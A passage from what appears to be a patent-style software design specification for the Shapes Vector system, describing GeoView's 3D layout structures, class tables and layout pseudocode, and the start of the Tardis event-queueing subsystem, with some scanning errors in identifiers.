• SEPARATION: The amount of separation to leave between objects. The greater the separation the greater the dynamic radius of the resulting ring.
FIG. 21 shows a five-object ring with CLOCKWISE direction. The origin will always be at the centre of the ring. If a ring contains only one object then it will be placed at the origin.
4.1.3.5 GenericStar
This layout structure places objects in a star One object will be assigned by the user as the root of the star and placed at the origin. The rest of the objects will be the leaves of the star and will be placed using a GenericRing. As well as the GenericRing arguments the user can also specify:
• ROOT_HEIGHT: This is the amount that the root of the star is raised above the plane.
4.1.3.6 GenericRectangle
This layout structure places objects in a rectangle. The user can specify the following arguments:
• ANGULAR DIRECTION: The direction (clockwise or anti-clockwise) in which objects are placed around the rectangle.
• START_SIDE: The side on which to start layout. The sides are numbered 0-3 with 0 being the top (far) side and subsequent sides extending clockwise.
• WIDTH_SEPARATION: The separation between objects in the width axis.
• DEPTH-SEPARATION: The separation between objects in the depth axis
• WIDTH: Specifies the width dimension of the resulting rectangle.
• DEPTH: This specifies the actual dimensions of the resulting rectangle.
If width or depth values are provided, then the radius of the objects, WIDTH_SEPARATION and DEPTH_SEPARATION will not be used in the layout.
4.1.3.7 GenericTree
This layout structure, like GenericGraph, also places the objects in a Graph, based on edge connections between those objects. GenericTree uses the same graph algorithm to determine the layout, but with different parameters. The ‘Tree graph is a directed edge graph, where edge direction is determined by the MasterTable's layout rules. For example, if the MasterTable specifies a Shared_Data_Link's layout rule as:
• “layout-structure Tree is_connected_to==type_of(Computer)”,
any Shared Data Link network object connected to a Computer, will be laid out as a Tree, with the direction of the edge from the Shared Data Link to the Computer. In this way, rather than the layout of a Tree being non-determrinistic given the same set of events, the Tree will be laid out in the same way each time. However, there are a few exceptions to this rule. If two objects of the same type are connected, or if at least one of the nodes is a structure node, then the direction becomes non-deterministic, like GenericGraph.
4.2 Concept of Execution
The execution concept for the GeoView module, including the flow of control, is described in Section 4.1 and Section 4.3 of this part.
4.3 Interface Design
Like DataView, GeoView interfaces with the Registry module and Tardis, which allow events and commands to be sent to it. The events arrive from the Intelligent Agents, and the commands arrive from the use; via different user tools, such as the Navigation System (nay) and the Configuration Editor (ConfigEd).
The Tardis handles incoming events from the agents, and commands are sent to GeoView via the Command Control Interface (CCI).
FIG. 22 shows the process interactions between the View Applications (GeoView/DataView), the Registry, and the Tardis.
5. Module Detailed Design
This section contains, for the GeoView module, the detailed design descriptions for the GeoView, LayoutHierarchy and LayoutStructureTemplateLibrary classes.
5.1 Geo View Classes
5.1.1 Geo View Class Summary
Table 3 identifies a full list and description of the GeoView classes.
TABLE 3
GeoView Classes
Class NameDescription Description
GV Action The GEOView specific action class.
GV ActionMan The GeoView specific action manager
class. Knows how to iterate over
LayoutHierarchy to refuter all nodes.
GV 300bject The GeoView 3DObject.
GVPacketMotionEffect Class that allows simple motion effect.
GV_EventFileReader The GeoView specific event file reader.
GV WorldMonitor The GeoView specific class for World
Monitor.
GeoView The main (singleton) class for GeoView
application
ControlGeoViewWorldService Class for adding GeoView specific
services to the CVSVWorld CCI
interface.
GeoViewCanvas Display/interface handling for
GeoView.
GeoViewSettings Subclass of ApplicationSettings to hold
the application specific settings for
GeoView.
5.2 LayoutHierarchy Classes
5.2.1 LayoutHierarchy Class Summary
Table 4 identifies a full list and description of the LayoutHierarchy classes.
TABLE 4
LayoutHierarchy Classes
Class Name Description
LH_CoordGroup This class contains a group of nodes whose (x, z)
coordinates all fall within a specific range.
LH_CoordOroupSet This class contains a set of related LH
CoordCroup nodes.
LHEdge This class stores information about one edge in
the LayoutHierarchy
LWEdgeSet This class is a container for all edges in the
LayoutHierarchy
LH_Graph This class is a container for a group of nodes that
are arranged as an adirected graph.
LH_Leaf The lowest node in the LayoutHierarchy. An
LU_Leaf node contains a NetworkObject and a
corresponding SV9DObject which contains the
3D data that represents the NetworkObject
according to the mles in the MasterTable
LU_Line This class is a container for a group of nodes that
are arranged in a line.
LH_Matrix This class represents a Matrix layout structure.
Nodes are added to the Matrix in a clockwise
spiral.
LH_Node This is the base class for all nodes in a
LayoutHierarchy. This class maintains the
following variables LH_Root*
mRootOfLfl .a pointer to the root of the
LayoutHierarchy. LH_Node*
mParent .a pointer to the parent of this node
C3DBranchflroup* mBranchGroup .a pointer to
the branch group that contains the geometry
of this node. This branch-group is attached
to the branchgroup of this nodes parent. This
means that mRootOfLH.mBranchOroup contains
the geometry for the entire LayoutHierarchy
(via a bit pattern). mt mPlaced .this
variable contains information about what
layout rules have been used to place this node
LH_Ring This class represents a ring shaped layout
structure. A ring has a LU_Leaf as its root and a
list of LU_Nodes as its children. The
branchgroup of the root in placed under this
nodes' branchgroup and the branchgroup of the
children are placed under the roots' branchgroup
LU_Root This class is the top level node in the
LayoutHierarchy. It is responsible for maintaining
a list of other LH_Node objects and
performing layout operations on them. It contains
pointer to the MasterTable that is used for layout
LU_SNode This class is the base class for all structure nodes
in the LayoutHierarchy. All structure classes
(LU_Star LU_Matrix LU_Line etc) inherit
from this base class and it provides an extra
interface on top of the standard LI-I_Node
interface
LU_Star This class represents a star shaped layout
structure. A star has a LU_Leaf as its root and a
list of LH Nodes as its children The branchgroup
of the root in placed under this nodes'
branchgroup and the branchgroup of the children
are placed under the roots branchgroup
LU_Tree This class is a container for a group of nodes that
are arranged as a directed graph, where edge
direction is determined by layout relationships
between different objects
NetworkObject .Contains information about a NetworkObject
5.2.2 Event Insertion and Removal Methods
5.2.2.1 cflnsert
This is the insertion method called directly by the World Monitor A command, a network object and an address are specified. Dependant on the command objects being added or removed, attributes are added or removed from the GeoView world.
• LH_Root::cflnsert(COMMAND, NetworkObject)
• On the basis of the COMMAND
• (where COMMAND=ADD OBJECT or ADD_AflRIBUTES)
• addInverseAttributes(networkobject) [Section 5.2.2.2]
• cflnsertNetworkObjectAdd(networkobject) [Section 5.2.2.3]
• (where COMMAND=REPLACE_OBJECT)
• removelnverseAttributes (networkobject
• cflnsertNetworkObjectReplace(networkobject) [Section 5.2.2.3]
• addInverseAttributes (networkobject); [Section 5.2.2.2]
• (where COMMAND=REPLACE_ATITRI13BUTES)
• removeInverseAttributes (networkObect)
• cfInsertNetworkObjectAttributesReplace (networkObject)[Section 5.2.2.3]
• addInverseAttributes(networkObject) [Section 5.2.2.2]
5.2.2.2 Adding Inverse Attributes
Each attribute is checked to see if it has a corresponding inverse attribute. If so a lookup of the secondary object is made. If it does not exist it is created and the inverse attribute is added to it, otherwise the inverse attribute is added to the existing secondary object.
LH_Root::addInverseAttributes(networkObject)
FOR each attribute in the networkobject
IF there exists an inverse relationship
Find the objectname from the value of the attribute IF
the leaf named objectname does NOT exist
Create a leaf named objectname
ENDIF
Add the inverse relationship to the leaf using the
name of the object
ENDIF
END FOR
5.2.2.3 NetworkObject Insertion
Each of the attributes from the passed in network object are added to the network object of the leaf node. The leaf node is then cached for further processing after the entire current batch of events has arrived.
• LH_Root::cfInsertNetworkObjectAdd(networkObject, address)
• FOR each attribute in the networkobject
• Call cfInsertAttrib(attribute, address) [Section 5.2.2.4]
• END FOR
• Call layout(leaf)
5.2.2.4 Attribute Insertion
If the leaf object specified by address does not yet exist then a new leaf is created and added to the lookup hash map. Otherwise the attribute is added to the existing leaf.
LH_Root::cflnsertAttrib ( attribute, address)
Do a lookup of leaf using address
IF the leaf does not exist yet
Create the leaf
Add attribute to leaf
Add leaf to leaf hash map
OTHERWISE
Add attribute to leaf
IF attribute added successfully
IFattribute added was LOCATED_AT
Do any necessary location processing
ENDIF
ENDIF
ENDIF
5.2.3 Layout Rule Application Methods
5.2.3.1 applyLayoutstructureRulesToObject
Structure Rules specify the logical groupings of world objects (represented as leaf nodes in the virtual world) by mapping them to layout structures on the basis of attribute tests. If a relevant layout structure is found via the structure rules then it is placed into this structure (which is created if necessary).
LH_Root::applybayoutStructureRulesToObject( leaf)
call findSatisfiedRules( “layout-structure”, rules,
satisfiers ) on the leaf [Section 5.2.3.4]
IF a satisfying layout structure was found
Process depending on the type of the layout structure
LAYOUT_STRUCTURE_LINE
IF the leaf is not already in a line layout structure
Call handleGenericLayoutStructure ( rule,
satisfiers, leaf, LINE)
END IF
LAYOUT_STRUCTURE_RING
IF the leaf is not already in a ring layout structure
Call handleGenericLayoutStructure (rule,
satisfiers, leaf, RING)
ENDIF
LAYOUT_STRUCTURE_MATRIX
IF the leaf is not already in a matrix layout structure
Call handleGenericLayoutStructure C rule,
satisfiers, leaf, MATRIX
ENDIF
LAYOUT_STRUCTURE_STAR
The star layout structure is specially handled.
handleStarLayoutStructure ( )
LAYOUT_STRUCTURE_GRAPH
Note that since graph is designed to merge with other
structure types, no check of being in an existing
graph is made here.
Call handleGenericLayoutStructure ( rule, satisfiers,
leaf, GRAPH)
ENDIF
1. handleGenericLayoutStructure
Assign the primary leaf node (the ‘this’ object) and the secondary leaf (parameter ‘leaf’) to an appropriate structure (which will possibly need to be created) on the basis of each satisfying attribute.
LH_Root::handleGenericLayoutstructure( rule, satisfiers, leaf, structure)
ITERATE over each of the satisfier attributes
IF there exists a secondary leaf (ie. This is a two-way
relationship match)
test if any primary leaf ancestor is in type of structure
test if any secondary leaf ancestor is in type of structure
structure
IF neither are in a structure already
Create a structure of type structure and add them
both to it
OTHERWISE IF both in different structures
merge those two structures into one of type structure
OTHERWISE one is not in a structure
add it to the one that IS
ENDIF
OTHERWISE
handle an Instance Match
ENDIF (there exists a secondary leaf node)
END ITERATION (over each attribute)
2. handleinstanceMatch
Each instance structure is stored using a unique objectTypeName: mappingLayoutRule key. For each instance it is checked to see if a structure for this particular layout rule and type already exists; if so it is added to it, otherwise an entirely new structure with this object's type and rule signature is created.
LH_Root::handlelnstanceMatch( Structure, node, rule, rootOfStar)
Create a unique object key using CfItem: :makeAddress with
the object type and the rule name
IF a structure currently has this signature add this
leaf node to that structure
OTHERWISE
create the new structure
add the structure with unique key to a lookup hash map
add this leaf node to the structure
ENDIF
5.2.3.2 applyAttachedToRulesToObject
Placement Rules specify the attachment and containment relationships of world objects on the basis of attribute tests. If a relevant attachment relationship is found via the layout rules then the primary object is either placed into an attachment relationship as the parent (i.e. things are attached to it) or as the child (i.e. attached to something). During this process any relevant layout rule arguments (LRAs) are read.
LH_Root::applyAttachedToRulesToObject( leaf)
Call findSatisfiedRules( “attached-to”, rules, satisfiers )
on the leaf[Section 5.2.3.4]
IF any satisfying rules were found
ITERATE through each satisfying rule found
read any layout rule arguments for this layout rule
IF this is NOT an inverse rule
(The primary object is attached to a single other
parent)
find secondary leaf node using the attribute value
and the leaf hash map
set sub-structure scaling on the basis of any
layout rule arguments
Call composeObjects( primary leaf, secondary leaf,
“attached-to”, LRA's)
OTHERWISE
(The primary object is the parent of the attached-to
relationship)
ITERATE through each satisfying attribute found
find the secondary leaf node via the attribute
value and lookup
set sub-structure scaling on the basis of any
layout rule arguments
Call composeObjects( second leaf, prime leaf,
“attached-to”, LRA's)
END ITERATION (each attribute)
END IF (rule is inverse)
END ITERATION (each rule)
END IF (any satisfying rules found)
5.2.3.3 applyLocatedinRulesTo Object
Placement Rules specify the attachment and containment relationships of world objects on the basis of attribute tests. If a relevant containment relationship is found via the layout rules then the primary object is either placed into a containment relationship as the parent (i.e. things are contained within it) or as the child (i.e. inside of something). During this process any relevant LRAs are read.
LH_Root::applyLocatedlnRulesToObject( leaf)
Call findSatisfiedRules( “located-in”, rules, satisfiers
on the leaf) [Section 5.2.3.4]
IF any satisfying rules were found
ITERATE through each satisfying rule
Read any layout rule arguments associated with the rule
IF the rule is NOT inversed
(Primary leaf node will be located in another leaf node)
find the secondary leaf node via lookup using the
first satisfier attribute value
call composeObjects( primary leaf, secondary leaf,
“located-in”, LRAs)
OTHERWISE
(Secondary leaf node will have other leaf nodes located within it)
ITERATE through each of the satisfying attributes
find the current secondary leaf node via lookup
with attribute's value
call composeObjects(secondary leaf, primary leaf,
“located-in”, LRA)
END ITERATION (each satisfying attribute)
END IF (rule is inverse?)
END ITERATION (each satisfying rule)
END IF (any satisfying rules were found)
5.2.3.4 findSatisfledRules
Find any matching structure rules from the MasterTable for the leaf node. For any found, record the rule matched, and an array of the satisfying attributes. Wildcards may be matched if they are present in the MasterTable. Processing of the unique LRA is done in this function also, matching instances as necessary.
LH_Node::findSatisfiedRules (ruleType, returned list of matching
rules, returned array indexed by matched rules of a list of attributes that
match the rule)
get the networkObject for this leaf node build the list of
layout mappings associated with objects of this type via
cfGetChildren in mTable (eg.
“MasterTable:GeoView:Computer:layout-structure”) append
to this list any WILDCARD matches
ITERATE through each mapping layout
get the ObjectAttributeTest for the napping layout
IF the layout rule from the mapping layout is of the
required rule type
IF the secondary object is a WILDCARD
(Secondary object wildcard processing)
create any rules and satisfying attributes for this
wildcard
OTHERWISE (secondary object is not a WILDCARD)
(Secondary object normal processing)
IF the right hand side of the layout rule represents
an object type
(Relationship processing)
call getAttributesThatSatisfy to build satisfying
attributes on OAT
OTHERWISE
(Do instance processing)
IF there is a unique flag in the Layout Rule
Arguments
call doUniqueLRAProcessing( TODO )
OTHERWISE (no unique flag)
find first attribute
END IF (unique flag exists?)
5.2.3.5 composeObjects
The passed in parent and child objects are composed or aggregated into an object composition via attachment or containment, i.e. with containment the child is contained within the parent and with attachment the child is attached to the parent. A child cannot be a descendant of parent is asserted.
Special processing is done in the case where the child is in a layout structure already and the parent is not. In this case the child is removed from the layout structure, composed with the parent, and then the entire object composition is reinserted back into the original child layout structure.
Consider the case where both the parent and child are already in layout structures. In this instance the parent takes precedence and as such the child is removed from its layout structure and composed with the parent (implicitly placing it into the parent's layout structure.)
LH_Root::composeObjects ( parent, child, composition type)
IF the child is already attached-to or located-in
EXIT function
END IF (child already attached-to or located-in)
IF the child is an ancestor of the parent
REPORT error
END IF (check not ancestor)
SET child structure to the layout structure (if any) that
the child is in
IF composition type is attachment
Call attach( child ) on parent
OTHERWISE (composition type not attachment)
Call contain( child ) on parent
END IF (composition type)
IF the child WAS in a layout structure AND the parent is not
INSERT the new composite object into the child
structure
END IF (child was in layout structure and parent isn't)
5.2.4 Leaf Edge Creation Methods
5.2.4.1 createEdges
Create any new edges that are to be associated with this leaf. During this processing, non visible edges are updated for LSTL components (for example Graph and Tree structures.)
LH_Leaf::createEdges( )
ITERATE through attributes associated with this leaf IF
the attribute's name is “IS_CONNECTED_TO”
Call createEdge( attribute ) [Section 5.2.4.2]
END IF (name is connected to)
END ITERATION
5.2.4.2 createEdge
Using the attribute, find the connected-to node. Ensuring there is no current visible edge, create a new one to it.
LH_Leaf::createEdge( matching attribute)
SET connectedToNode by using the string value of the
passed in attribute
Call cfGetReference( connectedToNode ) to find the node's
leaf instance (if any)
IF the node is found AND there is no current connection to it
SET absloc to the absolute location of the current node
SET conabsloc to the absolute location of the
connectedTo node
Call addEdge( this node, bc, conn. node, conloc) on
edgeSet singleton [Section 5.2.4.4]
Call addEdge( edge ) to add any non visible graph edges
to this node[Section 5.2.4.51
END IF (node found and no current connection)
5.2.4.3 updateEdges
Update edge locations on the basis of this Leaf's location.
LU_Leaf::updateEdges ( )
IF the delay processing flag is set
cache the current leaf for edge processing later
END IF (delay processing flag)
ITERATE through each of mEdges
Call setLocation( ) on the edge and make it the absolute
location of this leaf
END ITERATION
IF there is an attached-to structure node
Call updateEdges( ) on the structure node
END IF (attached-to structure node)
IF there is a located-in structure node
Call updateEdges( ) on the structure node
END IF (located-in structure node)
5.2.4.4 addEdge
An edge is added to the EdgeSet singleton.
LRYdgeSet::addEdge ( node1, location1, node2, location2)
IF currentline modulus 100 yields no remainder
ALLOCATE space for another 100 lines and set them
END IF (modulus 100)
Create a new edge
Add it to mEdges
Check for edge visibility and add it to the appropriate list
5.2.4.5 addGEdge
A non-visible edge interconnection is added on the basis of whether there is a common Graph (or graph sub-typed) parent. This keeps edge information for Graph and its descendents in the LSTL up to date.
• LH_Leaf::addGEdge(Edge)
• SET childNode1 via calling getNode1( ) on edge
• SET childNode2 via calling getNode2( ) on edge
• Look for a common graph/tree via calling
• findCommonSNode( ) on LH_SNode
• Add structure edge to the leaf
5.3 LayoutStnictureTemplateLibrary (LSTL) Classes
5.3.1 LSTL Template Class Summary
Table 5 identifies a full list and description of the LSTL classes.
TABLE 5
LSTL Classes
Class name Description
GenericGraph This template class places the objects in a graph.
GenericLine This template class places the objects in a line.
GenericMatrix This template class places objects in a matrix.
GenericRing This template class places objects in a ring.
GenericStar This template class places objects in a star
GenericRectangle This template class places objects in a rectangle.
GenericTree This template class places objects in a tree.
5.3.2 GenericGraph Methods
5.3.2.1 Node Separation Factor
This value indicates the amount of separation between nodes in the graph (horizontal spacing) relative to a unit value of 1.0.
Values: Positive floating point
Interface: float getNodeSeparationFactor( ) const
void setNodeSeparationFactor(const float val)
5.32.2 Rank Separation Factor
As similar to node separation factor this value represents the separation between ranks (vertical spacing).
Values: Positive floating point
Interface: float getNodeSeparationFactor( ) const
void setNodeSeparationFactor(const float val)
5.3.2.3 Orientation
This value determines whether the graph is orientated top-to-bottom or left-to-right.
Values: TOP_TO_BOTTOM, LEFT_TO_RIGHT
Interface: Graph Orientation Policy getOrientation( ) const
void setOrientation(const
Graph_Orientation_Policy orient)
5.3.3 GenericLine Methods
5.3.3.1 Axis
This determines which axis (x, y or z) the line will be parallel to.
Values: X_AXIS, Y_AXIS, Z_AXIS
Interface LSTL_LineAxis getAxi( ) const
void setAxis(const LSTL_LineAxis axis)
5.3.3.2 Linear Direction
This determines whether the line extends along the axis in a positive or negative direction.
Values: POSITIVE, NEGATIVE
Interface: LSTL_LinearDirection_getDirection( ) const
void setDirection( const LSTL_LinearDirection dir)
5.3.3.3 Origin
This determines whether the origin is located at the front back or centre of the line.
Values: FIRST. LAST, CENTER
Interface: LSTL_LineOrigin getOrigi( ) const
void setOrigin( const LSTL_LineOrigin origin)
5.32.4 Separation
This is the amount of spacing the algorithm leaves between each object in the line.
Values: Positive floating point
Interface: float getSeparatio( ) const
void setSeparation( const float sep)
5.3.4 GenericMatrix Methods
5.3.4.1 Width Separation
This is the amount of space in the X axis that is left between objects in the matrix.
Values: Positive floating point
Interface: float WidthSeparation( ) const
void WidthSeparation( const float sep)
5.3.4.2 Depth Separation
This is the amount of space in the Z axis that is left between objects in the matrix.
Values: Positive floating point
Interface: float DepthSeparation( ) const
void DepthSeparation( const float sep)
5.3.4.3 Delete Policy
This determines what the algorithm will do when an object is removed from the matrix. It can either leave a gap, fill in the gap with the last object or shuffle back all of the objects after the gap.
Values: LEAVE GAP FILL_GAP_FROM_END, SHUFFLE
Interface: LSTL_deletePolicy_gctDeletePolic( )_const
void setDeletePolicy( const LSTL_deletePolicy policy)
5.3.4.4 Origin Policy
Determines where the true centre of the matrix is located, either where the first object in the matrix is placed or the true centre.
Values: FIRST, CENTER
Interface: LSTL OriginPolicy getOriginPolicy( ) const
void setOriginPolicy( const LSTL_OriginPolicy policy)
5.3.5 GenericRing Methods
5.35.1 Angular Direction
This determines the direction in which objects are placed on the ring. It can be either clockwise or anti-clockwise
Values: CLOCKWISE, ANTI-CLOCKWISE
Interface: LSTL AngularDirection getDirection( ) coust
void setDirection( const LSTVAngularDirection dir)
5.3.5.2 Radius
This is a minimum radius for the ring. The algorithm will determine a dynamic radius based on object size and separation and if it is less than the user specified radius it will not be used. If it is greater it is used rather than the user specified one.
Values: Positive floating point
Interface: float getRadius( ) coost
void setRadius( const float radius)
5.3.5.3 Separation
The amount of separation to leave between objects. The greater the separation the greater the dynamic radius of the resulting ring.
Values: Positive floating point
Interface: float getNodeSeparation( ) const
void setNodeSeparation( const float nodeSeparation)
5.3.6 GenericStar Methods
52.6.1 Root Height
This is the amount that the root of the star is raised above the plane.
Values: Positive floating point
Interface: float getRootHeightO const
void setRootHeight( float rootHeight)
5.3.7 GenericRectangle Methods
5.3.7.1 Angular Direction
The direction (clockwise or anti-clockwise) in which objects are placed around the rectangle.
Values: CLOCKWISE, ANTI-CLOCKWISE
Interface: LSTL AngularDirection getDirection˜ const
void setDirection( const LSTLAngularDirection ang)
5.3.7.2 Start Side
The side on which to start layout. The sides are numbered 0-3 with 0 being the top (far) side and subsequent sides extending clockwise.
Values: Integral range [0 . . . 3]
Interface: int getStartSide( ) const
void setStartSide( int startSide)
5.3.7.3 Width Separation
The separation between objects in the width axis.
Values: Positive floating point
Interface: float getWidthSeparatin( ) const
void setWidthSeparation( const float widthSeparation)
5.3.7.4 Depth Separation
The separation between objects in the depth axis.
Values: Positive floating point
Interface: float getDepthSeparation( ) const
void setDepthSeparation( const float depthseparation)
5.3.7.5 Width
Specifies the width dimension of the resulting rectangle.
Values: Positive floating point
Interface: float getWidth( ) const
void setWidth( const float width)
5.3.7.6 Depth
This specifies the actual dimensions of the resulting rectangle.
Values: Positive floating point
Interface: float getDepth( ) const
void setDepth( const float depth)
5.3.8 LSTL Class Interface
Each of the classes in the LSTL defines a common interface as shown in Table 6.
TABLE 6
LSTL Class Interface
Method Desciption
iterator getFirst( ) const Get an iterator to the first object in
the structure.
Get an iterator to the first object NOTE: The type of iterator is defined
in the structure. in the class itself Currently it is
vector <T*>. Use
GenericStructure<Foo>::iterator as
the type may change.
iterator getLast( ) const Get an iterator to the last object in
the structure
const_iterator getFirstConst( ) Return constant iterator to beginning
const of children.
const iterator getLastconst( ) Return constant iterator to end of
const children.
int getNumChildren( ) const Get the number of objects in the
structure.
void insert(T*, element) Insert the given object into the
structure. Layout will be called if
doLayout is true (This is the default).
void relativePlacement( ) Perform layout on the objects in the
structure.
Perform layout on the objects in
the structure.
void remove(T*, element) Remove an object from the structure.
Layout will be called if doLayout
Remove an object from the is true. (This is the default)
structure. Layout will be called if
doLayout is true. (This is the
default)
void set<ATTRIBUTE>(arg) Set the appropriate attribute.
Get<ATTRIBUTE>( ) Get the appropriate attribute.
Each structure may have additional methods that only apply to it. More details can be found by looking at the interface of a particular class in automatically generated documentation or the header files.
5.3.8.1 Memory Allocation
The template classes are not responsible for memory allocation/de-allocation for the T*objects. In the users application the T objects should be maintained and pointers passed to the structure templates. The application will be responsible for complete control of the T objects.
5.3.8.2 Relative Placement
It is up to the user of the template object instance to call relativePlacement( ) when they want the layout algorithm to run for a particular layout structure. The layout algorithms will use the templated objects' getBoundsRadius( )call to ensure no overlap of the objects that are being placed.
5.3.9 T Interface
The object for instantiating a LSTL class must provide the interface as shown in Table 7.
TABLE 7
T Interface
Method Description
void setLocation ( float x, float y. Each layout algorithm will call this
float z) method in order to set the location
for each object
void getLocation ( float& x, float& y. The current location of the object.
float& z)
char* getId ( ) A unique identifier for the object.
float getBoundsRadius( ) Each algorithm will take into
account the size of each object in
the structure when laying them out.
This call should return the radius
of a sphere which completely
encompasses the object.
6. Appendix for GeoView
This section contains a glossary to the SDD for the GeoView module. It contains abbreviations and definitions of terms used in the SDD.
7.1 Abbreviations
The following are abbreviations used in this document.
Term/Acronym Meaning
CCI Component Control Interface
CSCI Computer Software Configuration Item
DID Data Item Description
LRA Layout Rule Argument
LSTL Layout Structure Template Library
SDD Software Design Description
SSDD System/Subsystem Design Description
SSS System/Subsystem Specification
7.2 Definition of Terms
The following are terms used in this document.
Term Description
Address A character string uniquely identifying the event and
operation.
Attachment A child object in an attached-to relationship with a
parent object.
Attributes String representations of the facets of a world object
or relationships to other world objects.
Batching Grouping of two or more events.
Bounds Radius The radius of influence about an object in GeoView.
Building The act of giving information to the renderer to
render a leaf node.
Composition Two or more objects in an attached-to or located-in
relationship.
Configuration Item The base level abstract class that holds the name
of an object and methods for insertion, deletion
and lookup of other objects.
Containment A child object in a located-in relationship with
a parent object.
Edge A physical line interconnecting two leaf nodes.
Events External information arriving in the form of
network objects.
Layout The act of combining the processes of leaf building,
layout rule application, edge creation and object
placement.
Layout Rules Rules specifying the attachment, containment or
layout structure grouping of a leaf node
(representing a world object) based on its
attributes.
Layout Structure A logical grouping construct that does placement on
child leaves based on the shape of the structure.
Leaf Node GeoView's graphical building blocks representing
objects in the world.
MasterTable A hierarchical set of mappings from world objects
to leaf nodes specifying visual attributes and
layout rules.
Network Object An container of one or more attributes.
Node The abstract base parent of layout hierarchy classes.
Object Represents either a leaf or layout structure in
GeoView.
Parent The node directly above the current one in the
layout hierarchy.
Placement The act of placing an object in the GeoView
Universe either absolutely or relatively.
Relationship A string describing the logical connection
between two leaf nodes.
Root The singleton instance at the top of the layout
hierarchy.
Scene Graph The Java 3D API data structure for rendering in 3D
worlds Singleton Recognised design pattern that is
used to create a class that is guaranteed to have
only one object instance in the application.
Structure A Layout Structure that is a direct child of the
top-level structure
Sub-structure A Layout Structure that is a direct child of a
parent leaf node. Used for grouping leaf nodes
that are in a composite with the parent leaf node.
Top Level The top most structure level of the layout hierarchy
where the parent structure is the top level structure.
World Objects Physical or logical objects that exist or are defined
in the real world .eg. Computer, Shared Data Link
PART 5 TARDIS SPECIFICATION 1. Tardis Specification
Tardis is briefly discussed in Section 2.1.4 of the Shapes Vector Overview, Part 1 of this specification.
The following is a preferred specification of its characteristics in the embodiment described. However, it is also possible for the Tardis to operate independently and/or in conjunction with other elements not related to elements of the preferred embodiment.
It is possible for Tardis to operate with just the Gestalt or just one observation sub-system such as Geo View or Data View. It is also possible to construct configurations of the Shapes Vector system in which the event outputs from agents is fed via the Tardis to a third-party visualisation or analysis system, or to a text-based event display. In cases where time-based queuing and semantic filtering of events is not required, the system could alternatively be configured in such a way as the event outputs from agents are delivered directly to one or more of the view components in a real time visualisation system.
1.1 Introduction
The Tardis is the event handling sub-system of Shapes Vector. It manages incoming events from a system Client, in a typical arrangement the Gestalt, and makes them available for Monitors (a recipient observation sub-system) to read. There can be many Clients and Monitors connected to the Tardis at the same time.
The Tardis receives events from Clients via connections through Tardis Input Portals, and uses Shared Memory as its form of inter-process communication with Monitors. Tardis Input Portals support different types of connections, such as socket transaction.
The flow of data through the Tardis is in one direction only, the Tardis reads from the connections with the Clients, and writes to Shared Memory.
1.2 Assumptions
For the purpose of this disclosure of a preferred embodiment, it is assumed that the reader is familiar with the products, environments and concepts that are used with the Shapes Vector infrastructure disclosed earlier in this specification.
2. Overview of the Tardis
The Tardis receives events from one or more Clients/Sources that can be located physically close or remote from the Tardis and supplies them to Recipient Systems that also can be remotely located. A Recipient system may also be a Client/Source. Each Client/Source associates with each event an ordered data value that is, in an embodiment, one of an incrementing series of data values. Typically the ordered data value is representative of real or synthetic time as gauged from an agreed epoch. Since the data value can be compared with other data values they are useful for ordering events within a common queue (the term slot is also used in this specification to describe the function of a queue). Since different events in different queues can have the same data value they can be identified or grouped to provide a temporal view of the events that does not have to be a real time view. For example, by creating one or more spans or changing the magnitude of the span of the data values output by the Tardis it is possible to provide control over time and then present events to the Recipient systems relating to those times. The timed event output to a Recipient system could be in synchronisation with real time, if desired by the user observing the system Recipient system output. It is also possible to change the rate of flow of the data values selected for output from the Tardis thus controlling the time span over which those events are presented for observation. There may be triggers available to initiate one or more time related outputs that can be set by the observing user to assist their detection of predetermined events. Further the triggers and their effect may be determined by way of calculations on data values set by the user of the system. Not all events are of the highest importance hence there is a means by which different priority can be allocated for each event and handled by Tardis. So that an event's priority will determine its order of output from Tardis and/or whether the event can be discarded under certain circumstances such as when the system is under extreme load. The unify bit described in this specification is an embodiment of the event prioritization system.
There is an agreed semantic associated with each event and there will exist in Tardis a slot for each semantic.
2.1 Components
The Tardis uses several different threads during execution, each fulfilling different roles within the Tardis. There is the Tardis Master Thread (M Thread), a set of Event Processing Threads (X Threads), a set of Update Threads (Y Threads), a set of New Connection Threads (Z Threads) and a set of Control Socket Threads (C Threads).
The Tardis is comprised of various data structures, such as the Tardis Store, Slots, Cells, Cell Pools and their Managers.
2.2 Overview of Operation
As the M Thread starts, it creates a set of Input Portals, which represent the conduits through which Clients send events to the Tardis. Each Input Portal creates a Z Thread to manage new connections for the Input Portal. The M Thread then creates a set of X Threads (as many as specified by the user) and a set of Y Threads (as many as specified by the user). It also creates some C Threads for communication with external processes via CCI (Component Control Interface), and creates the Tardis Store. Note that the Tardis is a process, which contains many threads, including the original thread created by the process, the M Thread.
The X Threads grab events coming in from the Input Portal Connections and place them in their corresponding queues in the Tardis Store. The Tardis Store resides in shared memory. When a clock tick occurs, an update begins, which requires the Y Threads to update the preferred double buffered event lists (there are write lists and read lists, which switch every update, giving double buffered behaviour). When a switch occurs, a new set of event lists is presented to the Monitors.
The Tardis is able to accept a specified set of instructions/requests from external entities through any one of its CCIs. This functionality is provided via the C Threads, providing external control and instrumentation for the Tardis.
3. Tardis Concepts
3.1 Events
An event is used to represent the fact that some occurrence of significance has taken place within the system, and may have some data associated with it. There is a global allocation of event identifiers to events with associated semantics in the system.
Conceptually, all events in the Tardis are the same, but in implementation, there are two event formats. The first is an incoming (or network) event, as received by the Tardis via an Input Portal Connection from Clients. This event consists of an identifier, a timestamp, an auxiliary field and a variable length data field. The auxiliary field contains the event's unify flag, type, the length of the event's data (in bytes) and some unused space.
The second event format is an Event Cell, as used within the Tardis and read by Monitors. Event Cells share some of the fields of an incoming event. They have a Cell Pool Manager pointer (which points to the Cell Pool Manager who manages the cell), a next cell and previous cell index (to link with other Event Cells), a first Data Cell index (to link with a Data Cell), a timestamp, an auxiliary field (same content as for an incoming event) and a fixed size data field.
The Cell Pool Manager pointer is used when placing a cell back into a free cell list (within the relevant Cell Pool Manager). The next cell index is used when the cell is in a free cell list, a data Cell list or an Event Cell queue or list. The previous Event Cell index is used when the Event Cell is in an Event Cell queue. The only other difference between a network event and an Event Cell is that an Event Cell has a fixed size data field and a first Data Cell index instead of a variable length data field. For reasons of efficient storage, the first part of the variable length data field is placed in the fixed size data field of the Event Cell. The rest is placed in a sequence of Data Cells which each point (via an index, not an address) to the next Data Cell, with the last possibly being partially filled. The first of the sequence of Data Cells is pointed to by the first Data Cell index.
